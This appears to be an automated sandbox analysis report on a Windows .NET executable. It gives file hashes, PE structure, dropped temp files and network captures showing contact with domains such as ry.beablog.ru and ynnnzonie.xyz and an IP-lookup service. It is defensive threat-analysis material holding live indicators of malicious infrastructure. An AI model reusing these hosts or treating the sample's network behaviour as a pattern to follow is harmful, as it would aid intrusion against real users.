Size (bytes):	1026
Entropy (8bit):	4.694574194309462
Encrypted:	false
SSDEEP:	24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
MD5:	78801AF1375CDD81ED0CC275FE562870
SHA1:	8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
SHA-256:	44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
SHA-512:	E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
Malicious:	false
Preview:	NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

C:\Users\user\AppData\Local\Temp\tmpEEE.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695900624002646
Encrypted:	false
SSDEEP:	12:55kzf0ILfo2TdftHFyQ9yi5pS2+w9gHtKgqin5q+GzA0Kb08Vb5nY1NLIeukWg/w:56zcILlTxtX9j5TijGzVURS5IBgSGVny
MD5:	BC4419B8B9970FEDCD704610C64179B0
SHA1:	71BD107584E1CFC5E5E75F765C064FC13228BC96
SHA-256:	A2115F382834559DCAB7139CB455FEFBEBBF07B89E2B4B8CFA3DC152491DAC1F
SHA-512:	454E3C24F975C0F56F152D24D32C544918CC7663B01CC50C717FAD082B201D4265DA9C5808AFA58573BC104AB739330AEAD49156FA7E7419B3D7CE130EAF3142
Malicious:	false
Preview:	PWZOQIFCANBQJPWANKEGOVMEWCFFLEMZUVJQOAQAXGCTWZTWYUTVQQWHVDWHRFTNLRYVNIIZGTGOYHBWUXFUJYWYCZRMHOWCZUBHGWNSMDGQIDGAHRDCIIAVORACBTBRHJNIBWQWQCOIRDJVGLMDNVRGTPPKQFQIFZZUCPJOKPUOXSLQIOBEKHODJTILUMNILLOSWDYCRTPWNPHXZSIAIJKAJTPYTYBSZZXRMUJHEQKDIDPVCZFDCTZVNAOYHSQJIJCWEYINXRRNANLPHUEMCLBTQNKFXRNDFJSUGZSSZUNTRNIONZRKWLCPJJQIACLJRBWZWPPPYJBUFAPIIHMQCTYHBSEEDXNTHPLWQREXFJXBUHCFLIGJQMAKBUMLPAYETALQAGUXNUAYOOFWKCXOAFADMANFEKSMOMEUZZFFPVSMHLOYRHXJRRAJALQVRIPUMMCCTGEVBPFLMLHCUGHBKDAURARQMEAWSQWOEBWEPWRBOUUAYHFAMWPSLAHUCSHDTXVLAVOAPCJJOBGMTOASVLNTADXOSSNCBIQVQFWDQSOVWWEBSZHOUAWBRJTVEBGJZEWIEYONXLCRVUQSPXKKPFJIUUWJMLGZBROUKKZUPWGOUIGYNFESGKBBHDAQFXCOZMLVFRUCCOPOYCHAFADUTZZFJYKNDQVJBTYSEVUHBFRNMKFNLBLTGEBDFOSOUEGYXVCXFUPTCVGNVFDGPBRNRCMUVADFIZDQITOTSQQNGGDMNJWJTVAKLEFUUJBLMKOVXJNLWUOGSIVLILHQAZSXDLYYVDPHGSRAAYZOADQUOKQJOANLTVTRHVTUTVJTLAQTNSTQOAIWGJAUNLGKTGFSZYKOTDQQLCHNAGGJECKGDNKFKBCFITQOVNMOIZLXAGNUBDQXAGJBSLDBFKOBLLWCHJAPFBBKFXQCXWXHIIQWQFYRIZJGDPOSSOCUECDWDQBRDSTMSCNGFBWWIQKBSVUPZMODDPXNVVXBEEMTHIHG

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.597503289724213
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	YZ1q5HY7kK.exe
File size:	44032
MD5:	77dfc735d37c3f44ab13d253ccd5417c
SHA1:	fa4d120c3f31281722c11c65aecf200634e7299b
SHA256:	802c523228e29013b5b60c643272ba0c837a7de3902c55424d7779535309a235
SHA512:	e832c2ff754038f1a69374a8dc24ded93dd62cbd0a886fa04b2469ec6ab715611bf8d942d7e25016fcaf19844f19c8436d09c51f851147f1842c20e43fd2000f
SSDEEP:	768:LzSH3iuh2l6b3xa1XX8ZUa9agkTfzbFdADwj6eXnn3cmF:aRUlshWn8aa9aRjheEn3z
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............f.... ........@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x40bc66
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0xDBB3B79A [Sun Oct 20 21:37:30 2086 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
inc ebx
add byte ptr [edx], bh
add byte ptr [eax+eax+57h], bl
add byte ptr [ecx+00h], ch
outsb
add byte ptr [eax+eax+50h], ah
add byte ptr [edx+00h], dl
dec edi
add byte ptr [eax+eax+45h], dl
add byte ptr [ebx+00h], al
push esp
add byte ptr [edi+00h], ch
jnbe 00007F49548C3F22h
jnc 00007F49548C3F22h
pop esp
add byte ptr [ebp+00h], cl
imul eax, dword ptr [eax], 00720063h
push eax
add byte ptr [edx+00h], dl
dec edi
add byte ptr [eax+eax+45h], dl
add byte ptr [ebx+00h], al
push esp
add byte ptr [edi+00h], ch
jnc 00007F49548C3F22h
outsd
add byte ptr [esi+00h], ah
je 00007F49548C3F22h
add byte ptr [esi+00h], cl
push eax
add byte ptr [edx+00h], dl
dec edi
add byte ptr [eax+eax+45h], dl
add byte ptr [ebx+00h], al
push esp
add byte ptr [ebp+00h], al
push esp
add byte ptr [eax+eax+46h], bl
add byte ptr [edx+00h], dh
popad
add byte ptr [ebp+00h], ch
push eax
add byte ptr [edx+00h], dl
dec edi
add byte ptr [eax+eax+45h], dl
add byte ptr [ebx+00h], al
push esp
add byte ptr [ebp+00h], ah
jnbe 00007F49548C3F22h
outsd
add byte ptr [edx+00h], dh
imul eax, dword ptr [eax], 5Ch
add byte ptr [esi+00h], dh
xor al, 00h
add byte ptr [eax], dh
add byte ptr [esi], ch
add byte ptr [ebx], dh
add byte ptr [eax], dh
add byte ptr [eax+00h], dl
push edx
add byte ptr [edi+00h], cl
push esp
add byte ptr [ebp+00h], al
inc ebx
add byte ptr [eax+eax+33h], dl
add byte ptr [ecx], dh
add byte ptr [ecx], bh
add byte ptr [eax+eax+41h], bl
add byte ptr [eax+eax+64h], ah
add byte ptr [ecx+00h], cl
outsb
add byte ptr [eax+00h], dl
push eax
add byte ptr [edx+00h], dl
dec edi
add byte ptr [eax+eax+45h], dl
add byte ptr [ebx+00h], al
push esp
add byte ptr [edx+00h], dh
outsd
add byte ptr [ebx+00h], ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc14	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x2a8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xbbf8	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x9d54	0xa000	False	0.46142578125	data	5.82572932559	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x2a8	0x400	False	0.298828125	data	2.1645038876	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe000	0xc	0x400	False	0.025390625	data	0.0446870062539	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xc058	0x24c	data

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright
Assembly Version	0.0.0.0
InternalName	Dianthus.exe
FileVersion	0.0.0.0
ProductVersion	0.0.0.0
FileDescription
OriginalFilename	Dianthus.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2021 10:35:04.826376915 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:04.882992983 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:04.883193970 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:04.929982901 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:04.986234903 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:04.991019011 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:04.991049051 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:04.991061926 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:04.991168022 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:04.998943090 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.056497097 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.130774975 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.187974930 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.188210964 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.188246965 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.188265085 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.188302994 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.188339949 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.188364983 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.188378096 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.188410044 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.188430071 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.188455105 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.188458920 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.188473940 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.188481092 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.188523054 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.244817019 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.244847059 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.244894981 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.244913101 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.244919062 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.244931936 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.244962931 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.244975090 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.244981050 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.245028973 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.245049000 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.245064974 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.245090008 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.245100021 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.245136976 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.245143890 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.245151997 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.245172024 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.245196104 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.245214939 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.245259047 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.245305061 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.245332003 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.245373964 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.245424032 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.245482922 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.245501995 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.245517015 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.245528936 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.245563984 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.301285982 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.301312923 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.301350117 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.301366091 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.301392078 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.301424980 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.301436901 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.301444054 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.301460981 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.301474094 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.301496029 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.301515102 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.301544905 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.301606894 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.301624060 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.301635981 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.301651001 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.301675081 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.301696062 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.301836967 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.301856041 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.301872015 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.301879883 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.301898003 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.301914930 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.301920891 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.301930904 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.301974058 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.302000999 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.302016973 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.302048922 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.302118063 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.302162886 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.302198887 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.302216053 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.302259922 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.302275896 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.302357912 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.302397013 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.302402973 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.302438021 CEST	443	49719	81.177.140.169	192.168.2.4
Apr 8, 2021 10:35:05.302475929 CEST	49719	443	192.168.2.4	81.177.140.169
Apr 8, 2021 10:35:05.302529097 CEST	443	49719	81.177.140.169	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2021 10:34:55.091037989 CEST	65248	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:34:55.103621960 CEST	53	65248	8.8.8.8	192.168.2.4
Apr 8, 2021 10:34:55.209748983 CEST	53723	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:34:55.222424984 CEST	53	53723	8.8.8.8	192.168.2.4
Apr 8, 2021 10:34:58.195207119 CEST	64646	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:34:58.215698004 CEST	53	64646	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:04.679991007 CEST	65298	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:04.802932024 CEST	53	65298	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:22.911014080 CEST	59123	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:22.923682928 CEST	53	59123	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:23.008702993 CEST	54531	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:23.078823090 CEST	53	54531	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:25.355206013 CEST	49714	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:25.386272907 CEST	53	49714	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:25.395181894 CEST	58028	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:25.415061951 CEST	53	58028	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:29.289218903 CEST	53097	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:29.360119104 CEST	53	53097	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:29.896845102 CEST	49257	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:29.909370899 CEST	53	49257	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:30.582432032 CEST	62389	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:30.595547915 CEST	53	62389	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:35.600982904 CEST	49910	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:35.619263887 CEST	53	49910	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:36.824826956 CEST	55854	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:36.836847067 CEST	53	55854	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:39.697437048 CEST	64549	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:39.710994959 CEST	53	64549	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:40.806643009 CEST	63153	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:40.819274902 CEST	53	63153	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:51.240546942 CEST	52991	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:51.317507029 CEST	53	52991	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:51.763200998 CEST	53700	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:51.870259047 CEST	53	53700	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:52.425144911 CEST	51726	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:52.438011885 CEST	53	51726	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:52.914223909 CEST	56794	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:52.927577972 CEST	53	56794	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:53.327528954 CEST	56534	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:53.354693890 CEST	56627	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:53.368443012 CEST	53	56627	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:53.391580105 CEST	53	56534	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:53.807523012 CEST	56621	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:53.954786062 CEST	53	56621	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:54.375859976 CEST	63116	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:54.389035940 CEST	53	63116	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:55.181123972 CEST	64078	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:55.232299089 CEST	53	64078	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:57.692893028 CEST	64801	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:57.772105932 CEST	53	64801	8.8.8.8	192.168.2.4
Apr 8, 2021 10:35:58.484725952 CEST	61721	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:35:58.498161077 CEST	53	61721	8.8.8.8	192.168.2.4
Apr 8, 2021 10:36:05.668694019 CEST	51255	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:36:05.684184074 CEST	53	51255	8.8.8.8	192.168.2.4
Apr 8, 2021 10:36:06.917195082 CEST	61522	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:36:06.935003042 CEST	53	61522	8.8.8.8	192.168.2.4
Apr 8, 2021 10:36:15.272996902 CEST	52337	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:36:15.285445929 CEST	53	52337	8.8.8.8	192.168.2.4
Apr 8, 2021 10:36:15.945107937 CEST	55046	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:36:15.957856894 CEST	53	55046	8.8.8.8	192.168.2.4
Apr 8, 2021 10:36:31.758810043 CEST	49612	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:36:31.770694971 CEST	53	49612	8.8.8.8	192.168.2.4
Apr 8, 2021 10:36:38.082137108 CEST	49285	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:36:38.095139980 CEST	53	49285	8.8.8.8	192.168.2.4
Apr 8, 2021 10:36:39.615228891 CEST	50601	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:36:39.641402006 CEST	53	50601	8.8.8.8	192.168.2.4
Apr 8, 2021 10:36:46.733285904 CEST	60875	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:36:46.746311903 CEST	53	60875	8.8.8.8	192.168.2.4
Apr 8, 2021 10:36:50.052738905 CEST	56448	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:36:50.065323114 CEST	53	56448	8.8.8.8	192.168.2.4
Apr 8, 2021 10:36:52.733714104 CEST	59172	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:36:52.746836901 CEST	53	59172	8.8.8.8	192.168.2.4
Apr 8, 2021 10:36:55.429903030 CEST	62420	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:36:55.446178913 CEST	53	62420	8.8.8.8	192.168.2.4
Apr 8, 2021 10:36:57.675101995 CEST	60579	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:36:57.688244104 CEST	53	60579	8.8.8.8	192.168.2.4
Apr 8, 2021 10:36:59.089864969 CEST	50183	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:36:59.102996111 CEST	53	50183	8.8.8.8	192.168.2.4
Apr 8, 2021 10:36:59.963366985 CEST	61531	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:36:59.975330114 CEST	53	61531	8.8.8.8	192.168.2.4
Apr 8, 2021 10:37:05.634309053 CEST	49228	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:37:05.646943092 CEST	53	49228	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 8, 2021 10:35:04.679991007 CEST	192.168.2.4	8.8.8.8	0xc369	Standard query (0)	ry.beablog.ru	A (IP address)	IN (0x0001)
Apr 8, 2021 10:35:23.008702993 CEST	192.168.2.4	8.8.8.8	0xf906	Standard query (0)	ynnnzonie.xyz	A (IP address)	IN (0x0001)
Apr 8, 2021 10:35:25.355206013 CEST	192.168.2.4	8.8.8.8	0xae90	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Apr 8, 2021 10:35:25.395181894 CEST	192.168.2.4	8.8.8.8	0xbf53	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Apr 8, 2021 10:35:29.289218903 CEST	192.168.2.4	8.8.8.8	0xeae1	Standard query (0)	ynnnzonie.xyz	A (IP address)	IN (0x0001)
Apr 8, 2021 10:35:30.582432032 CEST	192.168.2.4	8.8.8.8	0x7aea	Standard query (0)	ynnnzonie.xyz	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 8, 2021 10:35:04.802932024 CEST	8.8.8.8	192.168.2.4	0xc369	No error (0)	ry.beablog.ru		81.177.140.169	A (IP address)	IN (0x0001)
Apr 8, 2021 10:35:23.078823090 CEST	8.8.8.8	192.168.2.4	0xf906	No error (0)	ynnnzonie.xyz		104.217.62.116	A (IP address)	IN (0x0001)
Apr 8, 2021 10:35:25.386272907 CEST	8.8.8.8	192.168.2.4	0xae90	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
